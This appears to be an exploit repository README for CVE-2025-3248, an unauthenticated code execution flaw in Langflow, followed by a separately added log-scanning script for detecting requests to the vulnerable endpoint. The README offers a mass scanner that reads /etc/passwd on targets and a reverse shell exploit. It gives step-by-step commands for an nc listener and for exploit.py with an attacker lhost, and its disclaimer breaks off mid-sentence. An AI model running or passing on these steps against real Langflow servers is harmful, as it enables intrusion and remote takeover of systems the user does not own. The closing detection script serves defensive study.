Exploit for Missing Authentication for Critical Function in Langflow
Description

## CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE)

This repository contains two Python scripts:

- `LangflowCheck.py`: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248.
- `exploit.py`: A working reverse shell exploit for vulnerable Langflow targets.

### Summary

CVE-2025-3248 is a critical vulnerability in Langflow AI that allows unauthenticated attackers to execute arbitrary Python code remotely via a crafted payload to `/api/v1/validate/code`.

### Files

`LangflowCheck.py`

- Checks if a target is vulnerable by attempting to execute a harmless payload that reads `/etc/passwd`.
- Can scan a single target or a list of URLs.
- Supports outputting vulnerable targets to a file.

`exploit.py`

- Sends a reverse shell payload to the vulnerable endpoint.
- Requires attacker IP (`lhost`) and listener port (`lport`).
- Logs activity to `exploit.log`.
- Supports listener check before sending payload.

### Usage

1. Install Requirements

```bash
pip install -r requirements.txt
```

2. Run Vulnerability Scanner

Single URL

```bash
python3 LangflowCheck.py --url https://target.com --output vulnerable_target.txt
```

Multiple Targets

```bash
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
```

3. Exploit a Target

First, start a listener:

```bash
sudo nc -nvlp 4444
```

Then, run the exploit:

```bash
python3 exploit.py --target https://target.com --lhost YOUR_IP --lport 4444
```

You should receive a shell if the target is vulnerable.

### ⚠️ Disclaimer

This exploit is for educational and…
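Because `/api/v1/validate/code` accepts requests without authentication, any POST to it from an unexpected source is worth triaging. The following is an added example, not part of the repository described above: it scans reverse-proxy access logs for such requests and summarizes them per source IP. The Combined Log Format, the trusted network range and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

ENDPOINT = "/api/v1/validate/code"  # endpoint named in the description above
# Assumption: networks from which calls to the endpoint are expected.
TRUSTED = [ip_network("10.0.0.0/8")]
# Assumption: the reverse proxy in front of Langflow writes Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SAMPLE_LOG = [  # constructed sample lines using documentation address ranges
    '203.0.113.7 - - [10/Apr/2025:12:00:01 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [10/Apr/2025:12:00:05 +0000] "POST /api/v1/validate/code/ HTTP/1.1" 401 40 "-" "python-requests/2.31"',
    '10.1.2.3 - - [10/Apr/2025:12:01:00 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Apr/2025:12:02:00 +0000] "GET /api/v1/validate/code HTTP/1.1" 405 0 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Apr/2025:12:03:00 +0000] "POST /api/v1/flows HTTP/1.1" 200 0 "-" "curl/8.0"',
]

def is_trusted(ip):
    """True if the client address falls inside an expected network."""
    try:
        addr = ip_address(ip)
    except ValueError:  # hostname or malformed field: treat as untrusted
        return False
    return any(addr in net for net in TRUSTED)

def find_hits(lines):
    """Return POST requests to ENDPOINT that come from untrusted sources."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Ignore query string and trailing slash when comparing the path.
        path = m["path"].split("?", 1)[0].rstrip("/")
        if path == ENDPOINT and not is_trusted(m["ip"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"])})
    return hits

def summarize(hits):
    """Per source IP: total requests and how many received a 2xx response."""
    total = Counter(h["ip"] for h in hits)
    ok = Counter(h["ip"] for h in hits if 200 <= h["status"] < 300)
    return {ip: {"requests": n, "accepted": ok[ip]} for ip, n in total.items()}

if __name__ == "__main__":
    print(summarize(find_hits(SAMPLE_LOG)))
```

A non-zero `accepted` count means the endpoint answered an untrusted client with a success status, which is the case to prioritize for investigation.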
